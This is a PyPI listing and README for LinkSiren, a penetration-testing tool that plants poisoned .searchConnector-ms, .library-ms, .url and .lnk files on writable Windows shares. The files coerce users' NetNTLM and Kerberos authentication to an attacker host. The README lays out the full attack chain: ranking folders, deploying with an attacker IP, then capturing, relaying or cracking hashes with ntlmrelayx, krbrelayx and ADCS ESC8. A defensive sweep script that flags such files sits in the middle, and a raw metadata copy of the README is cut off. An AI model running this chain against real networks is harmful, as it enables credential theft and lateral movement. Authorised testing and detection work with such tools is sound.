linksiren

Name: linksiren
Version: 0.0.4
Summary: Generation, targeted deployment, and scalable cleanup for files that coerce Windows authentication.
Upload time: 2025-01-20 16:41:21
Author: George Hamilton
Requires Python: >=3.9
License: BSD 3-Clause License Copyright (c) 2023, gjhami Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Keywords: coerce, pentest, windows, authentication, coercion
Requirements: impacket, tqdm

# LinkSiren

[![Latest Version](https://img.shields.io/pypi/v/LinkSiren.svg)](https://pypi.python.org/pypi/LinkSiren/)
[![Python Versions](https://img.shields.io/badge/python-3.9%2B%20%7C%20PyPy-blue.svg)](https://pypi.org/project/linksiren/)
[![GitHub License](https://img.shields.io/github/license/gjhami/LinkSiren)](https://github.com/gjhami/LinkSiren/blob/main/LICENSE)

_The Siren waits thee, singing song for song._ - Walter Savage Landor

LinkSiren is your new favorite escalation tactic when you're stuck as a non-privileged user with lots of access to file shares. LinkSiren distributes .library-ms, .searchConnector-ms, .url, and .lnk files to optimal locations in accessible file shares to coerce NetNTLM and Kerberos authentication over SMB and HTTP from users that open them, and to start the WebClient service on their machines. It's like [Farmer](https://github.com/mdsecactivebreach/Farmer/tree/1f37598125a92c9edf41295c6c1b7c258143968d), [Lnkbomb](https://github.com/dievus/lnkbomb), or [Slinky](https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-slinky), but it identifies the best place to put the files for maximum coercion, has scalable deployment and cleanup built in, and generates detailed logs useful for client engagements.

# Installation
Using pipx (Recommended)
```
# Install linksiren
pipx install git+https://github.com/gjhami/LinkSiren.git
```

<details>
<summary>Alternatively, install from PyPI or source</summary>

Using PyPI
```
# Install from PyPI using pipx
pipx install linksiren
```

From Source
```
# Download source code
git clone https://github.com/gjhami/LinkSiren.git
cd LinkSiren

# Optional: Set up a virtual environment and install requirements
python -m venv .venv
source ./.venv/bin/activate # Linux
# .\.venv\Scripts\activate # Windows

# Install requirements
python -m pip install -r requirements.txt
```

</details>

# Typical Usage
```bash
# Identify optimal locations for poisoned file deployment
linksiren identify --targets <shares file> [domain]/username[:password]

# Deploy to identified locations
linksiren deploy --attacker <attacker IP> [domain]/username[:password]

# Capture hashes / relay authentication / exploit the WebClient service

# Cleanup poisoned files
linksiren cleanup [domain]/username[:password]
```

# Detailed Usage
1. Create a targets file for crawling containing accessible hosts, shares, or folders on each line in the following format. If a host is specified, shares will be identified on the host and treated as the next level of depth for crawling:
```
\\server1.domain.tld\
\\server2.domain.tld\share1
\\server3.domain.tld\share2\folder1\subfolder1
```

2. Use LinkSiren to crawl the provided paths to the specified depth, searching for the ideal location to place a file that will coerce authentication. Resulting UNC paths are saved in `folder_targets.txt` in the current directory.
```bash
# Note: You may fine-tune the --max-depth, --active-threshold, --fast, and --max-folders-per-target params as necessary.
# You may also fine-tune --max-concurrency to improve performance.
# Note: Specify '.' as the domain to log in using a local user account
linksiren identify --targets targets.txt [domain]/username[:password]
```

3. Use LinkSiren to deploy payloads to the locations identified in step 2. Optionally, specify a payload name and extension. The payload type (.searchConnector-ms, .library-ms, .lnk, or .url) will be selected automatically from the extension. Folders where payloads were successfully written are saved to `payloads_written.txt`. Use the hostname or DNS name of the attacker host and perform poisoning as necessary to get intranet zoned, as described in my blog post [DNS Hijacking: Say My Name](https://alittleinsecure.com/dns-hijacking-say-my-name/) and [theHackerRecipes](https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/webclient#abuse), to coerce HTTP authentication.
```bash
linksiren deploy --attacker <attacker IP> [domain]/username[:password]
```

4. Let the hashes come to you and relay them as you see fit :)
    - Find LDAP(S) Targets: Use [LdapRelayScan](https://github.com/zyn3rgy/LdapRelayScan) or [NetExec's ldap-checker](https://www.netexec.wiki/ldap-protocol/check-ldap-signing) to identify LDAP services vulnerable to relay.
    - Find MSSQL Targets: Use [mssqlrelay](https://github.com/CompassSecurity/mssqlrelay) to identify MSSQL services that do not enforce encryption and are therefore vulnerable to relay. Also, consider combining this with information about Microsoft Configuration Manager to perform [TAKEOVER-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/TAKEOVER/TAKEOVER-1/takeover-1_description.md).
    - Find SMB Targets: Use [NetExec's SMB functionality](https://www.netexec.wiki/smb-protocol/enumeration/smb-signing-not-required) to identify SMB services vulnerable to relay.
    - Find HTTP Targets: Use this [one-liner](https://x.com/Defte_/status/1795815420903002495) to check for ADCS ESC8 without authentication, or use NetExec/Certipy/Certify with authentication to identify ESC8 and other escalation paths as [described by TheHackerRecipes](https://www.thehacker.recipes/ad/movement/adcs/#recon) that may also be viable relay targets.
    - Use NTLMRelayx from [Impacket](https://github.com/fortra/impacket) to relay to identified targets with pcredz for hash capture on the attacker machine. I highly recommend `-socks` mode with NTLMRelayx.
    - [Krbjack](https://github.com/almandin/krbjack) or [Krbrelayx](https://github.com/dirkjanm/krbrelayx) could be used to relay Kerberos authentication to a machine if you can create a DNS record, thanks to a technique published by James Forshaw and described in a [blog post](https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx) from Synacktiv. Domain users may create new DNS records by default, and creating new DNS records is often possible without authentication thanks to [DDSpoof](https://github.com/akamai/DDSpoof). Note that the target service for the relay attack must map to the same service class as the relayed authentication, and the service must not implement signing, channel binding, or extended protection for authentication.

5. Cleanup the payload files when the attack is finished. LinkSiren will output messages about any previously written payloads that it isn't able to successfully delete.
```bash
linksiren cleanup [domain]/username[:password]
```

6. Scan for the WebClient service, now likely started on several machines; see [theHackerRecipes](https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/webclient#recon) for details. See this BHIS presentation [Attack Tactics: Shadow Creds for Privesc](https://www.linkedin.com/posts/black-hills-information-security_attack-tactic-shadow-creds-activity-7284615209929891840-Po8m) for how HTTP authentication coerced from the service can be used for privesc and lateral movement. Additionally, see my blog post [Files that Coerce](https://alittleinsecure.com/files-that-coerce-search-connectors-and-beyond/) for details of how a machine, once taken over using shadow credentials, can be used to coerce authentication from logged-in users.

# Attack Path Associated with LinkSiren
1. (Optional) Get Intranet-Zoned if you want to coerce HTTP authentication. See the note in [theHackerRecipes WebClient Abuse](https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/webclient#abuse) and my blog post [DNS Hijacking: Say My Name](https://alittleinsecure.com/dns-hijacking-say-my-name/).
2. Create a list of UNC paths to writeable SMB shares.
    - Note: You may also just provide a list of hosts (ex. `\\<host>`). Linksiren will list the shares on the host and add the base folder of each share as a target.
    - Note: Write and delete privileges are distinct on Windows. It is possible you can create a poisoned file but will not have permissions to delete it. If this happens, LinkSiren will be very verbose in letting you know.
3. [Optional] Run LinkSiren in `generate` mode to write templates locally.
4. [Optional] Run LinkSiren in `rank` mode to output rankings for accessible folders based on recent access.
5. Run LinkSiren in `identify` mode to find the best places to put poisoned files.
6. Start a listener or relay on your attacker machine to capture and/or relay coerced authentication to services without Signing/Channel Binding like LDAP, MSSQL, SMB, AD CS (HTTP), and others.
7. Run LinkSiren in `deploy` mode to place payloads in the optimal locations identified.
8. Let the hashes roll in. Relay and/or crack as desired.
9. Run LinkSiren in `cleanup` mode to delete all the poisoned files.

# Usage Modes
LinkSiren offers the following modes of operation:

### Generate
Create poisoned files to use for coercion and store them locally.

<details>
<summary>Usage</summary>

```
linksiren generate --help
usage: linksiren generate [-h] -a ATTACKER [-n PAYLOAD]

Output specified payload file to the current directory instead of a remote location.

options:
  -h, --help            show this help message and exit
  -n PAYLOAD, --payload PAYLOAD
                        (Default: @Test_Do_Not_Remove.searchConnector-ms) Name of payload file ending in .library-ms, .searchConnector-ms, .lnk, or .url

Required Arguments:
  -a ATTACKER, --attacker ATTACKER
                        Attacker IP or hostname to place in malicious URL
```
</details>

### Rank
Given a list of accessible shares or hosts, output ranks for the folders within them based on the likelihood that placing a file in the folder will coerce authentication from a user.

<details>
<summary>Usage</summary>

```
linksiren rank --help
usage: linksiren rank [-h] -t TARGETS [-md MAX_DEPTH] [-at ACTIVE_THRESHOLD] [-f] [-is IGNORE_SHARES [IGNORE_SHARES ...]] [-mc MAX_CONCURRENCY] credentials

Output identified subfolders and rankings to folder_rankings.txt

options:
  -h, --help            show this help message and exit
  -md MAX_DEPTH, --max-depth MAX_DEPTH
                        (Default: 3) The maximum depth of folders to search within the target.
  -at ACTIVE_THRESHOLD, --active-threshold ACTIVE_THRESHOLD
                        (Default: 2) Number of days as an integer for active files.
  -f, --fast            (Default: False) Mark folders active as soon as one active file in them is identified and move on. Ranks are all set to 1 assigned.
  -is IGNORE_SHARES [IGNORE_SHARES ...], --ignore-shares IGNORE_SHARES [IGNORE_SHARES ...]
                        (Default: 'C$' 'ADMIN$' 'SYSVOL') Do not review the contents of specified shares when crawling as part of the folder ranking process.
  -mc MAX_CONCURRENCY, --max-concurrency MAX_CONCURRENCY
                        (Default: 4) Max number of concurrent processes to use for crawling in rank and identification modes. Note: a maximum of 1 process is used per host. So linksiren will never make multiple simultaneous connections to the same host and concurrent processing will not
                        accelerate crawling multiple shares on a single host.

Required Arguments:
  credentials           [domain/]username[:password] for authentication
  -t TARGETS, --targets TARGETS
                        Path to a text file containing UNC paths to file shares / base directories within which to rank folders as potential locations for placing poisoned files.
```
</details>

### Identify
Given a list of accessible shares or hosts and customizable constraints, including a maximum number of target folders per share, output UNC paths to the optimal folders for placing poisoned files.

<details>
<summary>Usage</summary>

```
linksiren identify --help
usage: linksiren identify [-h] -t TARGETS [-md MAX_DEPTH] [-at ACTIVE_THRESHOLD] [-f] [-is IGNORE_SHARES [IGNORE_SHARES ...]] [-mf MAX_FOLDERS_PER_TARGET] [-mc MAX_CONCURRENCY] credentials

Identify target folders for payload distribution and output to payload_targets.txt

options:
  -h, --help            show this help message and exit
  -md MAX_DEPTH, --max-depth MAX_DEPTH
                        (Default: 3) The maximum depth of folders to search within the target
  -at ACTIVE_THRESHOLD, --active-threshold ACTIVE_THRESHOLD
                        (Default: 2) Max number of days since within which a file is considered active.
  -f, --fast            (Default: False) Mark folders active as soon as one active file in them is identified and move on. Ranks are all set to 1.
  -is IGNORE_SHARES [IGNORE_SHARES ...], --ignore-shares IGNORE_SHARES [IGNORE_SHARES ...]
                        (Default: 'C$' 'ADMIN$' 'SYSVOL') Do not review the contents of specified shares when crawling as part of the folder ranking and optimal poisoning folder identification process.
  -mf MAX_FOLDERS_PER_TARGET, --max-folders-per-target MAX_FOLDERS_PER_TARGET
                        (Default: 10) Maximum number of folders to output as deployment targets per supplied target share or folder.
  -mc MAX_CONCURRENCY, --max-concurrency MAX_CONCURRENCY
                        (Default: 4) Max number of concurrent processes to use for crawling in rank and identification modes. Note: a maximum of 1 process is used per host. So linksiren will never make multiple simultaneous connections to the same host and concurrent processing will not
                        accelerate crawling multiple shares on a single host.

Required Arguments:
  credentials           [domain/]username[:password] for authentication
  -t TARGETS, --targets TARGETS
                        Path to a text file containing UNC paths to file shares / base directories to crawl for optimal locations to write poisoned files.
```

</details>

### Deploy
Generate poisoned files for coercion and deploy them to specified UNC paths. Typically the specified UNC paths are the output of `identify` mode. Output a list of UNC paths to folders where payloads were successfully deployed for cleanup.

<details>
<summary>Usage</summary>

```
linksiren deploy --help
usage: linksiren deploy [-h] -a ATTACKER [-t TARGETS] [-n PAYLOAD] credentials

Deploy payloads to all folder UNC paths listed one per line in the file specified using --targets

options:
  -h, --help            show this help message and exit
  -t TARGETS, --targets TARGETS
                        (Default: 'payload_targets.txt') Path to a text file containing UNC paths to folders into which poisoned files will be deployed.
  -n PAYLOAD, --payload PAYLOAD
                        (Default: @Test_Do_Not_Remove.searchConnector-ms) Name of payload file ending in .library-ms, .searchConnector-ms, .lnk, or .url

Required Arguments:
  credentials           [domain/]username[:password] for authentication
  -a ATTACKER, --attacker ATTACKER
                        Attacker IP or hostname to place in poisoned files.
```
</details>

### Cleanup
Remove all payloads from the specified UNC paths, typically the output of `deploy` mode.

<details>
<summary>Usage</summary>

```
linksiren cleanup --help
usage: linksiren cleanup [-h] [-t TARGETS] credentials

Delete poisoned files from folder UNC paths specified in --targets

options:
  -h, --help            show this help message and exit
  -t TARGETS, --targets TARGETS
                        (Default: 'payloads_written.txt') Path to a text file containing UNC paths poisoned files to clean up.

Required Arguments:
  credentials           [domain/]username[:password] for authentication
```

</details>

# Other Information
### What Payload Type Should I Use?
Search Connectors (.searchConnector-ms): This is generally the best option. They require the least amount of interaction, start the WebClient service from a stopped state automatically when the parent folder is opened in Explorer, and are capable of coercing both SMB and HTTP authentication using a single file.
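From the defender's side, the same four file types are what a share sweep should look for, whether left behind after a failed cleanup or planted by someone else. The following is an added example, not part of LinkSiren, that walks a mounted share and flags any .searchConnector-ms, .library-ms, .url, or .lnk file whose UNC or http(s) references point at a host outside an allowlist; the sample files, the `Reports` folder, the `.corp.example` hosts and the 192.0.2.10 stand-in host are all constructed for the demo.

```python
"""Defender-side sweep: walk a mounted share and report Explorer-parsed files
(.searchConnector-ms, .library-ms, .url, .lnk) that reference hosts outside an
allowlist. Added example; not part of LinkSiren."""
import os
import re
import tempfile
import xml.etree.ElementTree as ET  # for untrusted input prefer defusedxml
from pathlib import Path

# The four file types Explorer interprets when a folder is opened (per the README).
COERCING_EXTENSIONS = {".searchconnector-ms", ".library-ms", ".url", ".lnk"}

# Host part of UNC (\\host\...) and http(s)://host references in plain text...
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)")
HTTP_RE = re.compile(r"https?://([A-Za-z0-9._-]+)", re.IGNORECASE)
# ...and the same two shapes as UTF-16LE strings inside binary .lnk files.
UNC_U16_RE = re.compile(rb"\\\x00\\\x00((?:[A-Za-z0-9._-]\x00)+)")
HTTP_U16_RE = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00((?:[A-Za-z0-9._-]\x00)+)")


def hosts_in_text(text: str) -> set[str]:
    """Every UNC or http(s) host mentioned in a text blob, lower-cased."""
    return {h.lower() for h in UNC_RE.findall(text) + HTTP_RE.findall(text)}


def hosts_in_lnk(data: bytes) -> set[str]:
    """.lnk is binary: check single-byte strings and UTF-16LE strings separately."""
    hosts = hosts_in_text(data.decode("latin-1"))
    for rx in (UNC_U16_RE, HTTP_U16_RE):
        hosts |= {m.decode("utf-16-le").lower() for m in rx.findall(data)}
    return hosts


def referenced_hosts(path: Path) -> set[str]:
    """Hosts referenced by one file, parsed according to its extension."""
    ext = path.suffix.lower()
    data = path.read_bytes()
    if ext == ".lnk":
        return hosts_in_lnk(data)
    if ext in (".searchconnector-ms", ".library-ms"):
        # Both are XML; scan every element text and attribute rather than trusting a fixed schema.
        try:
            root = ET.fromstring(data)
        except ET.ParseError:
            return hosts_in_text(data.decode("utf-8", errors="replace"))
        chunks = [e.text or "" for e in root.iter()]
        chunks += [v for e in root.iter() for v in e.attrib.values()]
        return hosts_in_text("\n".join(chunks))
    # .url is INI-style (URL=, IconFile=, WorkingDirectory=); a plain text scan is enough.
    return hosts_in_text(data.decode("utf-8", errors="replace"))


def scan_tree(root, allowed_hosts):
    """Return [{'path': relative path, 'hosts': [unexpected hosts]}] for flagged files."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.suffix.lower() not in COERCING_EXTENSIONS:
                continue
            try:
                unexpected = sorted(referenced_hosts(p) - allowed)
            except OSError:
                continue  # unreadable file; a real sweep should log this
            if unexpected:
                findings.append({"path": os.path.relpath(p, root), "hosts": unexpected})
    return findings


def run_demo():
    """Build a constructed sample tree in a temp dir and sweep it. 192.0.2.10 stands in
    for an unexpected host; the .corp.example hosts are the allowlisted internal ones."""
    with tempfile.TemporaryDirectory() as tmp:
        reports = Path(tmp) / "Reports"
        reports.mkdir()
        # Minimal, constructed stand-ins for the real formats (not complete, usable files).
        (reports / "@Test_Do_Not_Remove.searchConnector-ms").write_text(
            "<searchConnectorDescription><simpleLocation>"
            "<url>\\\\192.0.2.10\\share</url></simpleLocation></searchConnectorDescription>")
        (reports / "Shared Drive.library-ms").write_text(
            "<libraryDescription><searchConnectorDescriptionList><searchConnectorDescription>"
            "<simpleLocation><url>\\\\fileserver.corp.example\\docs</url></simpleLocation>"
            "</searchConnectorDescription></searchConnectorDescriptionList></libraryDescription>")
        (reports / "Intranet.url").write_text("[InternetShortcut]\nURL=https://intranet.corp.example/\n")
        (reports / "Reference.lnk").write_bytes(
            b"L\x00\x00\x00" + "\\\\192.0.2.10\\share".encode("utf-16-le"))
        findings = scan_tree(tmp, allowed_hosts=["fileserver.corp.example", "intranet.corp.example"])
    return sorted((Path(f["path"]).name, f["hosts"]) for f in findings)


if __name__ == "__main__":
    for name, hosts in run_demo():
        print(f"{name}: references {', '.join(hosts)}")
```

Only the two files pointing at 192.0.2.10 are reported; the library and shortcut that reference allowlisted internal hosts are left alone, so the sweep can run unattended across many shares without drowning in legitimate links.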

### How is this better than the other tools?
Summary
- Scales to an arbitrary number of malicious .searchConnector-ms, .library-ms, .url, or .lnk files
- Targeted malicious file placement
- Single command deployment and cleanup
- Cross platform with python

As in real estate, consider the three most important things when attempting to coerce auth using files: location, location, location. All techniques identified here only coerce authentication from users that open the folder containing the poisoned file.

Other tools are built to place a single malicious .searchConnector-ms, .library-ms, or .url file at a specified location and clean up that one malicious file. If you find yourself with access to a lot of shares, then you may want things to scale and you may not be in the mood to write a wrapper. Additionally, you may not know the best place to put a poisoned file in a sea of accessible shares.

LinkSiren crawls accessible shares and ranks every subfolder based on the likelihood it will be opened by a user sometime soon. Then it uses this information to target malicious file distribution to multiple locations at once. Additionally, LinkSiren records the full UNC path of malicious files it creates, allowing for cleanup with a single command.

### How will you make it even better?
I'm looking to add the following features:
- [ ] Add safety features:
    - [ ] Check if a file exists before overwriting it with a payload in deploy mode.
    - [ ] Check if files can be deleted from a target path before creating a payload there.
- [ ] Add the ability to deploy files encrypted with EFS to trigger the start of the Encrypting File Service on Windows 11 machines so authentication can subsequently be coerced using tools like [Coercer](https://github.com/p0dalirius/Coercer) and [PetitPotam](https://github.com/topotam/PetitPotam).
- [ ] Repackage for use with UV.
- [ ] Add an option for 'invisible' targets for .Library-ms and .searchConnector-ms files where the icon is set to blank and the name is set to a non-printing, valid ASCII character.
- [ ] Test for anonymous access to shares.
- [ ] Enable authentication using a NTLM hash.
- [ ] Enable ticket-based authentication (Kerberos).
- [ ] Add pydantic validation for arguments including targets and output file names.
- [ ] Test the tool through a socks proxy connection to an smb share generated using ntlmrelayx.

### Disclaimer
This tool is designed for ethical hacking and penetration testing. It should be used exclusively on networks where explicit, written permission has been granted for testing. I accept no responsibility for the safety or effectiveness of this tool. Please don't sue me.

            

Raw data

            {
    "_id": null,
    "home_page": null,
    "name": "linksiren",
    "maintainer": null,
    "docs_url": null,
    "requires_python": ">=3.9",
    "maintainer_email": null,
    "keywords": "coerce, pentest, windows, authentication, coercion",
    "author": "George Hamilton",
    "author_email": null,
    "download_url": "https://files.pythonhosted.org/packages/82/3a/4c11a22d3fc8349d7fadf565eea2e016b5612e0ca0faec93b04261c05005/linksiren-0.0.4.tar.gz",
    "platform": null,
    "description": "# LinkSiren\r\n\r\n[![Latest Version](https://img.shields.io/pypi/v/LinkSiren.svg)](https://pypi.python.org/pypi/LinkSiren/)\r\n[![Python Versions](https://img.shields.io/badge/python-3.9%2B%20%7C%20PyPy-blue.svg)](https://pypi.org/project/linksiren/)\r\n[![GitHub License](https://img.shields.io/github/license/gjhami/LinkSiren)](https://github.com/gjhami/LinkSiren/blob/main/LICENSE)\r\n\r\n_The Siren waits thee, singing song for song._ - Walter Savage Landor\r\n\r\nLinkSiren is your new favorite escalation tactic when you're stuck as a non-privileged user with lots of access to file shares. LinkSiren distributes .library-ms, .searchConnector-ms, .url, and .lnk files to optimal locations in accessible file shares to coerce NetNTLM and Kerberos authentication over SMB and HTTP from users that open them and starting the Webclient service on their machines. It's like [Farmer](https://github.com/mdsecactivebreach/Farmer/tree/1f37598125a92c9edf41295c6c1b7c258143968d), [Lnkbomb](https://github.com/dievus/lnkbomb), or [Slinky](https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-slinky) but it identifies the best place to put the files for maximum coercion, has scalable deployment and cleanup built in, and generates detailed logs useful for client engagements.\r\n\r\n# Installation\r\nUsing pipx (Recommended)\r\n```\r\n# Install linksiren\r\npipx install git+https://github.com/gjhami/LinkSiren.git\r\n```\r\n\r\n<details>\r\n<summary>Alternatively, install from PyPi or source</summary>\r\n\r\nUsing PyPi\r\n```\r\n# Install from PyPi using pipx\r\npipx install linksiren\r\n```\r\n\r\nFrom Source\r\n```\r\n# Download source code\r\ngit clone https://github.com/gjhami/LinkSiren.git\r\ncd LinkSiren\r\n\r\n# Optional: Set up a virtual environment and install requirements\r\npython -m venv .venv\r\nsource ./.venv/bin/activate # Linux\r\n# .\\.venv\\Scripts\\activate # Windows\r\n\r\n# Install requirements\r\npython -m pip install -r 
requirements.txt\r\n```\r\n\r\n</details>\r\n\r\n# Typical Usage\r\n```bash\r\n# Identify optimal locations for poisoned file deployment\r\nlinksiren identify --targets <shares file> [domain]/username[:password]\r\n\r\n# Deploy to identified locations\r\nlinksiren deploy --attacker <attacker IP> [domain]/username[:password]\r\n\r\n# Capture hashes / relay authentication / exploit the WebClient service\r\n\r\n# Cleanup poisoned files\r\nlinksiren cleanup [domain]/username[:password]\r\n```\r\n\r\n# Detailed Usage\r\n1. Create a targets file for crawling containing accessible hosts, shares, or folders on each line in the following format. If a host is specified, shares will be identified on the host and treated as the next level of depth for crawling:\r\n```\r\n\\\\server1.domain.tld\\\r\n\\\\server2.domain.tld\\share1\r\n\\\\server3.domain.tld\\share2\\folder1\\subfolder1\r\n```\r\n\r\n2. Use LinkSiren to crawl the provided paths to the specified depth, searching for the ideal location to place a file that will coerce authentication. Resulting UNC paths are saved in `folder_targets.txt` in the current directory.\r\n```bash\r\n# Note: You may fine tune the --max-depth, --active-threshold, --fast, and --max-folders-per-share params as necessary.\r\n# You may also fine tune --max-concurrency to improve performance.\r\n# Note: Specify '.' as the domain to log in using a local user account\r\nlinksiren identify --targets targets.txt [domain]/username[:password]\r\n```\r\n\r\n3. Use LinkSiren to deploy payloads to the locations identified in step 2. Optionally, specify a payload name and extension. The payload type (.searchConnector-ms, .library-ms, .lnk, or .url) will be selected automatically from the extension. Folders where payloads were successfully written are saved to `payloads_written.txt`. 
Use the hostname or DNS name of the attacker host and perform poisoning as necessary to get intranet zoned, as described in my blog post [DNS Hijacking: Say My Name](https://alittleinsecure.com/dns-hijacking-say-my-name/) and [theHackerRecipes](https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/webclient#abuse), to coerce HTTP authentication.\r\n```bash\r\nlinksiren deploy --attacker <attacker IP> [domain]/username[:password]\r\n```\r\n\r\n4. Let the hashes come to you and relay them as you see fit :)\r\n    - Find LDAP(S) Targets: Use [LdapRelayScan](https://github.com/zyn3rgy/LdapRelayScan) or [NetExec's ldap-checker](https://www.netexec.wiki/ldap-protocol/check-ldap-signing) to identify LDAP services vulnerable to relay.\r\n    - Find MSSQL Targets: Use [mssqlrelay](https://github.com/CompassSecurity/mssqlrelay) to identify MSSQL services that do not enforce encryption and are therefore vulnerable to relay. Also, consider combining this with information about Microsoft Configuration Manager to perform [TAKEOVER-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/TAKEOVER/TAKEOVER-1/takeover-1_description.md).\r\n    - Find SMB Targets: Use [NetExec's SMB functionaltiy](https://www.netexec.wiki/smb-protocol/enumeration/smb-signing-not-required) to identify SMB services vulnerable to relay.\r\n    - Find HTTP Targets: Use this [one-liner](https://x.com/Defte_/status/1795815420903002495) to check for ADCS ESC8 without authentication, or use NetExec/Certipy/Certify with authentication to identify ESC8 and other escalation paths as [described by TheHackerRecipes](https://www.thehacker.recipes/ad/movement/adcs/#recon) that may also be viable relay targets.\r\n    - Use NTLMRelayx from [Impacket](https://github.com/fortra/impacket) to relay to identified targets with pcredz for hash capture on the attacker machine. 
I highly recommend `-socks` mode with NTLMRelayx.\r\n    - [Krbjack](https://github.com/almandin/krbjack) or [Krbrelayx](https://github.com/dirkjanm/krbrelayx) could be used to relay Kerberos authentication to a machine if you can create a DNS record thanks to the a technique published by James Foreshaw and described in a [blog post](https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx) from Synacktiv. Domain users may create new DNS records by default and creating new DNS records is often possible without authentication thanks to [DDSpoof](https://github.com/akamai/DDSpoof). Note that the target service for the relay attack must map to the same service class as the relayed authentication and the service must not implement signing, channel binding, or extended protection for authentication.\r\n\r\n5. Cleanup the payload files when the attack is finished. LinkSiren will output messages about any previously written payloads that it isn't able to successfully delete.\r\n```bash\r\nlinksiren cleanup [domain]/username[:password]\r\n```\r\n\r\n6. Scan for the WebClient service, now likely started on several machines, see [theHackerRecipes](https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/webclient#recon) for details. See this BHIS presentation [Attack Tactics: Shadow Creds for Privesc](https://www.linkedin.com/posts/black-hills-information-security_attack-tactic-shadow-creds-activity-7284615209929891840-Po8m) for how HTTP authentication coerced from the service can be used privesc and lateral movement. Additionally see my blog post [Files that Coerce](https://alittleinsecure.com/files-that-coerce-search-connectors-and-beyond/) for details of how a machine, once taken over using shadow credentials, can be used to coerce authentication from logged in users.\r\n\r\n# Attack Path Assocaited with LinkSiren\r\n1. (Optional) Get Intranet-Zoned if you want to coerce HTTP authentication. 
See the note in [theHackerRecipes WebClient Abuse](https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/webclient#abuse) and my blog post [DNS Hijacking: Say My Name](https://alittleinsecure.com/dns-hijacking-say-my-name/).\r\n2. Create a list of UNC paths to writeable SMB shares.\r\n    - Note: You may also just provide a list of hosts (ex. `\\\\<host>`). Linksiren will list the shares on the host and add the base folder of each share as a target.\r\n    - Note: Consider write and delete privileges are distinct on Windows. It is possible you can create a poisoned file but will not have permissions to delete it. If this happens, LinkSiren will be very verbose in letting you know.\r\n3. [Optional] Run LinkSiren in `generate` mode to write templates locally\r\n4. [Optional] Run LinkSiren in `rank` mode to output rankings for accessible folders based on recent access.\r\n5. Run LinkSiren in `identify` mode to find the best places to put poisoned files.\r\n6. Start a listener or relay on your attacker machine to capture and/or relay coerced authentication to services without Signing/Channel Binding like LDAP, MSSQL, SMB, AD CS (HTTP), and others.\r\n7. Run LinkSiren in `deploy` mode to place payloads in the optimal locations identified.\r\n8. Let the hashes roll in. Relay and/or crack as desired.\r\n9. 
Run LinkSiren in `cleanup` mode to delete all the poisoned files.\r\n\r\n# Usage Modes\r\nLinkSiren offers the following modes of operation:\r\n\r\n### Generate\r\nCreate poisoned files to use for coercion and store them locally.\r\n\r\n<details>\r\n<summary>Usage</summary>\r\n\r\n```\r\nlinksiren generate --help\r\nusage: linksiren generate [-h] -a ATTACKER [-n PAYLOAD]\r\n\r\nOutput specified payload file to the current directory instead of a remote location.\r\n\r\noptions:\r\n  -h, --help            show this help message and exit\r\n  -n PAYLOAD, --payload PAYLOAD\r\n                        (Default: @Test_Do_Not_Remove.searchConnector-ms) Name of payload file ending in .library-ms, .searchConnector-ms, .lnk, or .url\r\n\r\nRequired Arguments:\r\n  -a ATTACKER, --attacker ATTACKER\r\n                        Attacker IP or hostname to place in malicious URL\r\n```\r\n</details>\r\n\r\n### Rank\r\nGiven a list of accessible shares or hosts, output ranks for the folders within them based on the liklihood placing a file in the folder will coerce authentication from a user.\r\n\r\n<details>\r\n<summary>Usage</summary>\r\n\r\n```\r\nlinksiren rank --help\r\nusage: linksiren rank [-h] -t TARGETS [-md MAX_DEPTH] [-at ACTIVE_THRESHOLD] [-f] [-is IGNORE_SHARES [IGNORE_SHARES ...]] [-mc MAX_CONCURRENCY] credentials\r\n\r\nOutput identified subfolders and rankings to folder_rankings.txt\r\n\r\noptions:\r\n  -h, --help            show this help message and exit\r\n  -md MAX_DEPTH, --max-depth MAX_DEPTH\r\n                        (Default: 3) The maximum depth of folders to search within the target.\r\n  -at ACTIVE_THRESHOLD, --active-threshold ACTIVE_THRESHOLD\r\n                        (Default: 2) Number of days as an integer for active files.\r\n  -f, --fast            (Default: False) Mark folders active as soon as one active file in them is identified and move on. 
